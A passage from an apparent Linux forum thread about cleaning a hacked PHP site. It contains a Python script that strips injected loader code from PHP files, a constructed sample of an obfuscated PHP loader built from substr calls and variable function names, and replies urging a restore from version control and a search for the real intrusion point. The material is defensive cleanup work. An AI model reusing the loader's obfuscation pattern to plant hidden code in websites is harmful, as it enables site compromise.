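            with open(path, "r", encoding="utf-8", errors="surrogateescape") as fh:
                text = fh.read()
            cleaned, n = strip_injected(text)
            hit = looks_like_loader(cleaned)   # anything left that still looks injected?
            if n and not dry_run:
                shutil.copy2(path, path + ".bak")
                with open(path, "w", encoding="utf-8", errors="surrogateescape") as fh:
                    fh.write(cleaned)
            if n or hit:
                report.append((path, n, hit))
    return report

# Constructed sample: loader prepended on the same line as the site's real
# opening tag, so the site's own "?>" later on that line must survive.
SAMPLE_FILE = (
    "<?php $vucprjnldo = '" + "x" * 1100 + "'; "   # real blob is ~10 kB
    "$mawuedtwim=substr($vucprjnldo,(51847-41741),(21-14)); "
    "$bmnrgccpri=substr($vucprjnldo,(56718-46605),(42-30)); "
    "$bmnrgccpri($mawuedtwim, $tojphvmjdb, NULL); "
    "$bmnrgccpri=(506-385); $vucprjnldo=$bmnrgccpri-1; ?>"
    "<?php echo 'site'; ?> <html>\n"
)

if __name__ == "__main__":
    cleaned, n = strip_injected(SAMPLE_FILE)
    print(n, "block(s) removed ->", cleaned.strip())
    print("still looks like a loader:", looks_like_loader(cleaned))
    for path, n, hit in clean_tree(".", dry_run=True):
        print(f"{path}: removed={n} heuristic_hit={hit}")
```

Run it with `dry_run=True` first and read the report; only then rerun with `dry_run=False`, and run `php -l` over the touched files afterwards. Cleaning restores the files, not the server: the post below about restoring from version control and the later ones about the real entry point are the part that matters.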
08-27-2014, 08:00 AM
#12
LQ Guru
Registered: Feb 2004
Location: SE Tennessee, USA
Distribution: Gentoo, LFS
Posts: 10,649
Just, uhh, restore the contents of the server from a known-good copy in the, uhh, version-control system?
You do, uhh, have a separate development system with isolated, known-good source code, and you, uhh, merely do a git checkout to update the production system, right? You don't, uhh, "just develop the thing right there on the production server," right? . . .
1 members found this post helpful.
08-28-2014, 02:15 AM
#13
Member
Registered: Oct 2007
Location: Prague, CZ
Distribution: RedHat / CentOS / Ubuntu / SUSE / Debian
Posts: 749
Original Poster
It's all done at the moment and seems to be 'bacteria' free.
08-30-2014, 08:10 AM
#14
LQ Veteran
Registered: Feb 2003
Location: Maryland
Distribution: Slackware
Posts: 7,803
Quote:
Originally Posted by robertjinx
It's all done at the moment and seems to be 'bacteria' free.
Really? And how do you know that?
Seriously, the issue isn't that there was code in your PHP, the issue is that someone was able to gain access to your machine and modify your files. You just happened to stumble on the PHP stuff, who knows what else they did.
If you haven't solved the real problem, the bad guys will be back.
08-30-2014, 09:42 AM
#15
LQ Veteran
Registered: Jan 2011
Location: Abingdon, VA
Distribution: Catalina
Posts: 9,374
Quote:
Originally Posted by Hangdog42
Really? And how do you know that?
Seriously, the issue isn't that there was code in your PHP, the issue is that someone was able to gain access to your machine and modify your files.
+1. The code in the PHP file is just the stuff you found. A symptom of a worse condition.
If you're lucky, the PHP script code was all they did.